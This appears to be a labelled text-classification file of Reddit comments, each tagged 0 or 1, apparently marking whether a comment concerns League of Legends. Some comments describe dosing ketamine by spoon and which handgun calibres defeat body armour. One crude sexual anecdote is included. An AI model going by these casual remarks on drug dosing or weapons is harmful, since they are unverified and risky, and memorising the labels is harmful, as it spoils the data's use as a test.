1	Isn't this the champion that Saint's been going on about since like 6 months ago saying the next big legendary (or, clearly Ultimate) was going to be for one of his favourite champs? So you can basically rule out anything non-jungler, also things that weren't released when he was talking about it. Iirc it was when the legendary Nocturne skin was previewed.   *
1	Yes they very well may turn out that way.
0	Stands behind the squat rack saying "Yeah that's nice... You're killing it! Push it! WOW!"
0	woooooo boy. inappropriate ringtones? this story has been waiting ten years to be told.   so, back when I was around 20 I was working overnights for a toy retailer. I had always gotten along with everyone, and I had gotten pretty chummy with the manager, who was a pretty attractive older (to me) woman, probably early 40s. We weren't interested in each other, but we continually talked about relationships and sex, and cracked jokes to pass the time over the long shifts.   she was going through a rough time, her ex-husband had cheated on her, and left, and she was trying to raise her kids by herself, and pay for her house, etc. not to mention, she was single for the first time in a very long time and she wasn't having very good luck, despite being very pretty. so one of the younger kinda "bro" kids which is working there, who is around my age... maybe 21 or 22 is always talking about who he'd bang at work, and all that nonsense, and brings up our boss. it eventually happens, god knows how he pulled it off, and he cannot stop fucking bragging about it to me and the other younger guys.   so this is where I get kinda suspicious and doubtful and I ask my boss by bringing it up in one of our convos that lingered into that area. she proceeds to tell me how much of a mistake it was and how shitty he was in bed. he kept talking a bunch of trash about what he would do to her and wouldn't make a move, so when they were in the car one night after work, she got on top of him and rode the shit out of him. well, apparently he came in like a minute flat, no joke. he apologized and said he wasnt expecting that, and made up all this nonsense, but apparently it happened again after she gave him another shot, before she finally just gave up on him.   now he's still going around telling the younger guys he banged the boss and acting like some big shot, and it's not really effecting work, but our boss is getting agitated that he's bragging about it when he sucked in bed. so her and I are joking about it one day while we're working, and this was a few years after missy elliot had a big hit with "minute man", so I start playing it on my flip phone. now the big deal back then was buying ringtones. even bigger was people like me, who had the qualcom software and could make ringtones from mp3s then send them to the phone for free. for most phones back then it had to be a specific file format, sample rate, bit depth, length, etc. so I went home and made a minute man one for him, and set it, figuring it would be hilarious for my boss.   wellll, sure enough, the next day at work, I tell my boss to call me while we're working next to each other, and the ringtone goes off. she starts laughing hysterically and thinks it's the best thing in the world. I tell her, that's your ringtone, now every time you call we'll remember that story. so I'm thinking, "great, she's got redemption, it's all fun and games now, no hard feelings, right?". yea, no. so later on, it's just me and this kid working in the back, while everyone else is on the floor working freight. walkies aren't working again, surprise surprise. my boss calls me for something. no big de.... FUCK. one minute man starts playing. I answer the phone as quick as I can to turn off the ringer and answer whatever question she had. the other kid just turns to me and asks who it was. I told him our boss. he goes "..huh...." like an interesting, curious "oh" kind "huh", and goes back to work. man I was fucking mortified. I felt so fucking bad. I was friends with him too, but he really shouldn't have acted like he was such a big stallion in the bed.
1	I'd say it doesn't look legit, you have to press enter after you check/uncheck a role (no to big of the issue but makes me a little wary) also it seems out dated as it still uses secondary role as a search which riot doesn't do anymore.   >WE DO NOT WARRANT THAT THE FUNCTIONS PERFORMED BY THE SERVICE WILL BE UNINTERRUPTED OR ERROR-FREE, OR THAT THE SITE OR THE SERVERS THAT SUPPORT IT WILL BE FREE FROM VIRUSES OR OTHER HARMFUL COMPONENTS. WE DO NOT WARRANT THE ACCURACY OR COMPLETENESS OF ANY CONTENT RELATED TO PRODUCTS ON THIS SITE.   looks like if it gets damaged on the way they wont do much, also it states you may get viruses from the website and it might not even be that accurate to how the champions look.   >You must be at least 13 years of age to use the Site or the Service. If you are under the age of 18, you must have your parent’s permission to use the Site or the Service   > You agree that LoLomod may at any time without notice: move, change, or suspend any part of the Site or the Service; or refuse to accept your designed character or fulfill any order, or any part of any order if, in LoLomod’ sole discretion, you fail to comply with any of these Terms or if a competent regulatory authority requires us to do so.   So they could claim you didn't have parents permission and refuse to serve you last minuet without telling you if you are under 18.
1	Listen, the lag in NA sucks, but there is currently NO workable solution to this issue.   If CloudFlare can't handle it, then switching ISPs isn't going to do anything.   Until there's a practical way to block incoming NTP traffic or people learn how to configure their NTP servers/DNS resolvers properly this will be an issue that is difficult to circumvent even for the most capable of DDoS mitigation companies.
0	I mean assuming its caffeine only that he is measuring the spoons could be fine.   I do the same with ketamine.  Get out the spoon, fill to brim, then weigh it on a milligram scale.  Usually weighs out to be 100mg for me ... Which is perfect usually.  After measuring the initial dose of that batch I just use the spoon.   However density does vary greatly.  Speed, 2c-b, cocaine, and others have varying densities ... Which is why not having a milligram scale is dumb.
1	From what I've heard, most people have a problem with Braum's passive and his stun, so, with those in mind... what about making it so Braum's passive's stacks are applied by allies,  but  do not proc the damage or stun. The stacks just remain until Braum attacks the enemy, which will then proc the damage and stun. That way it'd feel like Braum's the one doing the heavy work, instead of just letting his carry do it for him. And about his shield... maybe instead of a movement speed bonus, it reduces his movement speed? I mean, I've read some complaints directed to how unrealistic it is that he holds his shield up and it causes him to actually move faster. But! in return for these nerfs, make it so Braum's ultimate applies a stack of his passive. That way his allies can put maximum stacks on his enemies, then Braum can just stun each enemy one by one. That way he's still able to retain his multi-target stun combo in team fights.
1	I had a game where I was Ashe and playing a defensive lane because the enemy miss fortune killed me for first blood. Anyway I want to back, so I push the lane and go to bush to recall. I type in "shopping brb". After I get to the base the jungler comes into the bot river bush. He said nothing about coming bot, so I figure he just wants to wait till I get back. Nope he just jumps in after the enemy comes back to the lane. I fire my enchanted arrow towards the ruckus, because I'm way to far away to do anything else and I wanted to help. Our taric goes in and stuns the enemy soraka while the retreating miss fortune is being chased down by our jungler. The arrow comes and hits soraka (fuck yeah noscope) but taric doesn't have the damage to finish her. Our jungler takes 2 tower hits before coming back to try to secure soraka's kill, but the enemy shaco comes bot and helps soraka escape after soraka ults. Miss fortune comes back and taric and our yi get caught in her ultimate. By this time I'm back in the lane, but theres not much I can do. I shoot a volley of frost arrows towards them while my team runs away, but Miss fortune picks up a kill on our jungler. Yi rages and says that I wasn't there for the gank. Swears that I fed miss fortune because she got first blood, and he swears at me for not being in the fight, and tells everyone on the team that he will never gank bot again.
0	I'd disagree with you. It's very hard to learn how to drive a car in a classroom, and very easy to learn how to drive a car in a car. You've got tactile feedback from the steering wheel, pedals, and gear shifter. You can feel the motion of the car around you, and how it responds to those controls. And every car is a different. It takes a little while to get used to how the car responds. Once you've driven a wider variety of cars it gets easier to adapt, but I bet if you've only driven one car, if you try another one that's significantly larger or smaller, or more or less powerful, it's going to feel foreign and uncomfortable for a little bit. You've got a whole lot of time to become comfortable with the physical operation of your car, but the classroom is the best time for you to become familiar with the rules of the road. Concepts like right of way can be confusing, and driver's ed is your one opportunity to ask questions to someone who knows the right answers about the rules of the road.
1	My experience with curse voice is a lot more fun. What I think tho, is that the higher you get in elo the friendlier and more sportsmanlike people tend to get.   I've once had a full curse voice team and it felt like we were doing ranked team full premade. Soon there would be the alpha figure everyone listened to because we all felt he had the best shotcalling. The enemy didn't have a chance for any resistance because we were all on the same line. There wasn't any stubborness just people wanting to win, and winning hard.   Ofcourse I've also had bad experiences with a guy who's TV was so loud I couldn't focus and flamers. But hey, there is this really easy invention, a mute button! And if after that they start flaming ingame? Mute them there aswell! If the flamers notices no one gives a damn about him flaming, then he will stop because he's not getting the attention he's seeking for.
1	AVALON (WINTERFOX TOP LANER) IS HELIOS'S BROTHER, DIAMOND 2 ON KOREAN SOLOQ LAST SEASON AND COULDN'T GET ON A KOREAN TEAM DESPITE TRYING FOR A WHILE.
0	Could be worse. Could be North Carolina ;-) Always some really stupid shit going down there from what I see on reddit.   But yeah. Working on quotas in Finland would basically go against the law regulating sales of drugs here because the pharmacies must offer the products with the lowest prices at all time. So even though we have Orion (medco) who makes Burana which is a Paracetamol tab and a huge brand in Finland, they still have to offer the generic stuff that's 1/4 of the price and similar kinds allowing Burana to have like just one fifth of the shelf space reserved for Paracetamol. If the pharmacies were allowed to they would probably try to push the most expensive stuff all the time, that's a no-no to my knowledge at this day. So at the end of the day, no matter how good the sales are, they don't make much profit though they do make some profit (after taxes ans wages and stuff like that).
0	Sorry for the rambling that is written below.   I'm going through the same thing right now. I thought that I was going to marry this girl. Our break up came so suddenly that I didn't want to believe that it was even happening. I love this girl more than anything that I have ever known. I felt like she completed me and I felt more connected to the world and more myself when I was with her. She was the only person that I felt comfortable telling everything to.  It went from me being the happiest that I've ever been to a living hell in two and a half weeks.   During those two and a half weeks she said that she felt anxious and felt like she had to go home. She distanced herself from me and continued to do so in the coming days. She said that she wanted to take back all of the promises that we had made each other and take a step back. I felt utterly crushed, those promises were sacred to me. I had already committed my life to hers. She kissed me passionately a lot during that time. I think that she was looking for something, but I don't know what she found. She said that she had doubts of if we were right for each other or not. She went home every weekend leading up to the breakup. That may have helped her, but it did not help us work out what was going on. I refused to believe that she would leave me. I believed that we could work out these problems and form a stronger bond because of that.   She ended it by telling me that she still loved me, kissed me 5 minutes before I asked her if she was breaking up with me. She started to sob uncontrollably and I couldn't console her... She told me that she didn't want to break up with me, but felt like she had too. She told me that she had doubts about weather or not we were right for each other, but she could never tell me why. I got in my car, but could not bring myself to leave. I walked back into the room and she was on the phone with her mom. I heard her mom say that "you have to tell him to leave, you don't want to hurt him again." I had to force her to tell me to leave because I felt like I couldn't drive away without those words. She told me that she couldn't be with me. It took an hour for her to tell me she wanted me to go.   A few weeks later she sent me what pretty much was a high school note. She summed up 2 and a half years in less than a page and now I know how she was feeling. She said that she had tried to convince herself that we were right for each other. She felt suffocated, exhausted and annoyed. She said that she couldn't be herself around me anymore. She also told me that the way that I felt about her was not healthy. It is true that I put everything into her and didn't spend as much time with the other people in my life. However, isn't that the way that you are supposed to feel about someone you truly love and want to spend the rest of your life with? She had even told me the same things. The horrible thing about that is that I didn't get to speak my own mind and get things off of my chest.   I believe that I know why she felt the way that she did, but it is only many theories that I've come up with searching for answers. I believe that she felt guilty giving herself to me before we were married and that her guilt started to make her believe that I was the only option, the only way to make things right and forgive herself. I say this because she had told me that she finally forgave herself a week before we broke up. You can't feel comfortable with something that you feel trapped by.   It's been a little over a month now, and I still have hope that we will one day be together again after we heal and grow as people. However, that fact remains that she walked out on me when things started to get a little ruff. She couldn't talk to me about her problems and even lied to herself about them. She didn't want to try...and I can't change that. I've come to terms that I will probably never get her back. We were not mature enough for the relationship that we had. She couldn't tell me how she was feeling, and I ignored the warning sign and didn't want to believe anything was wrong.   I believe that this time apart is good for us in the long run. I think that we are both becoming better stronger people because of this. I am going through the lowest point in my life. I can't sleep for more that 4 hours now, it's slowly getting better. I still dream about her. The magnitude of the situation has finally sunk in, I no longer believe that we are together for short amounts of time. I miss her more than I thought possible. I know that I have to let her go as much as I don't want too.   OP we deserve people that are going to work at a relationship when things aren't perfect. We all deserve someone who loves us for who we are and cherishes us. Someone who wants to spend their life with you. We will both find that person in our lives, but first we both need to move on and make ourselves better for the future relationships that we will forge. Cherish the time you had with them, but try to move on. I know that is easier said than done.
0	I had a car payment accidentally come out of my credit union account, which I wasn't using for anything at the time, which had a whopping $15ish in it. They bounced the payment, then charged me a $50 fee for the "convenience", cancelled my account without ever contacting me, and sent the remaining $35 fee to a collections agency. They never once contacted me about any of it, I had to find out from the collections agency because I didn't realize it had happened and had already made the car payment using my regular account just assuming it hadn't gone through because of some bank error with my regular bank. The whole time I just thought it had been an error with my regular bank, I had no idea that my car payment tried to come out of my credit union account.   Not only all of that, but previously I'd stopped using the credit union because they had NO way to deposit cash because there were no local branches and the ATM's they contracted with don't allow deposits. To make a Check deposit I'd have to go to this one particular UPS (yes, UPS) branch and have them deposit the check (no cash) to my bank account through their register.
1	i hate tryndamere even if i win lane against him.  he encourages everything stupid about top lane. infinite sustain, constant split pushing, and minimal incentive to ever teamfight.  if you ever leave lane to come dragon or whatever vs a tryndamere there's a good chance he will get both turrets.
1	I like how you say proof. All situational and needed further investigation. Should be re-label [Evidence]. The TSM "cheating" was after regi had the game restarted and dyrus(a biased view) says this so maybe not true but it fits with time and the fact Regi is talking to admin at time. Where as the frost was clear and was during game pause that was to be unpaused and lost TSM a strategy.
0	Someone had an interesting question ITT. If someone was assaulted by someone of a different race (asian, black, caucasian, what have you), and since then, they had a fear of that that race ever since. That fear would make them think that every time, late at night, if someone of that race was walking behind them, they were going to be assaulted. Would that be acceptable?
1	First penta was with Cassie. Team fight against a Malph, Kog, Soraka, Annie and Shaco. My team was Cassie (me), Ashe, Janna, something top AD/tankish..may have been my BF at the time as Sion (it's been awhile, can't quite remember), and Noc jungle. I was coming back from fountain, my team engaged on my signal (I was pretty much dominating that game anyways. Their whole team was there but Shaco (we will get to this ina moment.) I didn't have to use my ult, my team all died pretty much with an Annie ult (this is all in mid btw in between the river bushes). However, They were able to get them down enough and there was enough minions and such for me to kill all 4 of them and I had enough life steal for the about 500 or so health I had left. I was going to head back when I spot shaco via ward, about to pop from river bush to kill me. I slither my way towards him and right as he reaches bush, RAAAAAAAAAAAAAH! Ult to to the face which took 90% of his health. Popped poison on him and fang and "PENTA KILL." My heart was racing the whole time...They surrendered and I was 17-0-12.
1	I guess as a support item it would have problems as Ohmwrecker has right now. It would be useful early game but the cost of the item would be so high that supports won't be able to get it until mid-late game.   For example if you are sona late game and you use this item on your adc which is under heavy attack of enemy assassin, that one second of damage will be enough to kill you, so basically this item in the late game would be deciding who will die. You or your adc.   But I can see this as a summoner spell which will be used in early game in an example which is written in your post.
1	Standard is such an easy word. No education means you end up jobless, a cleaner or in wallmart. Education is a basis you can tweak towards a goal. Not having it means you will not be able to get any kind of decent work.   You seem to have the idea that education equals desk job but thats simply not true, unless you choose to specialise for a desk job   You seem to be pretty arrogant judging by your post. You're 14 years old and know nothing of the world. You think you know everything from the cover of your parents. You're barely learning social interaction because you don't have the opportunity to make new friends,  if you even have any. Everyone hated parts of school. It's just a means to an end. Your personality is formed from social interaction and friends. You are the one who's going to lack it
1	I disagree with the idea of a draft that Kelby is talking about.  But let's talk.   Brand Security (GOOD): Being able to secure a spot for longer than 4 months at a time is great for marketing, funding and otherwise monetizing the team and allowing it to grow. The can make ESports a Career instead of a short term prospect.  This is probably the BEST reason to have a draft and no longer have relegations. The backside to this is that teams that 'own' spots could potentially become either complacent and no longer try as hard to improve, weakening the scene, or pander to popularity over skill with the same effect.  I'm not saying it will happen, but if you open the door someone will walk through it.   Weakening of the Challenger Scene (BAD): Weakening the Challenger Scene would happen in two ways.  Primarily, the top teams are now gone and into the LCS.  This is fine.  In fact, that's the only way LCS Should expand.  The part that truly KILLS the challenger scene is that if there is a draft then the players are no longer playing just to top the Challenger scene, because that gets them far less than getting drafted does.   They are now playing also and perhap moreso to SHOW OFF THEIR SKILLS in hopes to being drafted.  Never should there be an incentive to compromise teamplay over individual play.   This doesn't mean that Kelby's idea is bad or even unusable.  There are other ways to structure it that could help.  One: The draft could be eligible for the top Challenger teams. This would mean you cannot be drafted into the pros unless you place high enough in Challenger.  Of course, this then limits the growth and ability to perform drastic changes in the pro scene due to limitations on draft.  Also, it kills the ability for new players to break into the pro scene if their position is saturated with talent.   If no one wants to replace their midlaner, then even if this new guy could carry his team to the LCS, he no longer has that avenue and the scene stagnates.   Perhaps a combination would be preferable:  10 Teams in the LCS, the bottom 2 can be relegated.  Drafting happens after relegation matches allowing for former pros and Challenger Players to be picked up.  This way you have more stability for teams, players, and you keep the incentive for new challenger teams to CLOUD 9 it all the way to Worlds.
1	This kinda depends on how Riot wants to define a good competitive player. As it is now a high ranking shows that not only are you good at a role but good at many roles. If they want to keep that definition then its going to be a hard to fix problem. It might be best to make communication easier by allowing the user to put some sort of information out there about how good he is at a certain role or what other roles he or she might be okay with filling on that particular game. The hard thing about the current way is that you have a minute to get all of this information in chat form and even then a lot of people just dont care and are not willing to work with you even if a solution was available had they the time. This would allow them to communicate their desires or ability much easier.
1	Since the site doesn't have an FAQ here is all the information I gathered:     The tool doesn't find your actual hidden MMR, it approximates it based on your recent match history. Thus, if you have hundreds of ranked solo queue games under your belt, it doesn't matter if they don't show up in your recent match history. It seems like it needs 5-10 of your recent games to be Solo Queue for this to work appropriately.     The MMR is going to be based on the averages of your team and the enemy team, individual MMR isn't available in any capacity currently through the metadata that we have access to. This means if you are duo queuing the MMR shown will represent an approximate average of the MMR of you and your partner combined (if you play with them in all your math history games).     It's going to be a bit more accurate than indicators such as LolKing Score, but  is neither exact nor official .
0	I respectfully disagree. I carry a Glock 19 with an extra mag. That's 31 rounds. Even level III body armor if hit multiple time in the same place is going to fail, and with that many rounds at least one is going to miss the body armor and hit flesh. To say that it's "not likely" that an armed individual would not likely be able to stop this guy is a bit of a stretch. It depends entirely on the individual, the gun they're using, and how much they train.   If the gunman were using level II body armor, 10mm or .357 magnum (depending on barrel length) would punch through the body armor. I know of several people who carry .357 magnum and one person who carries a 10mm.
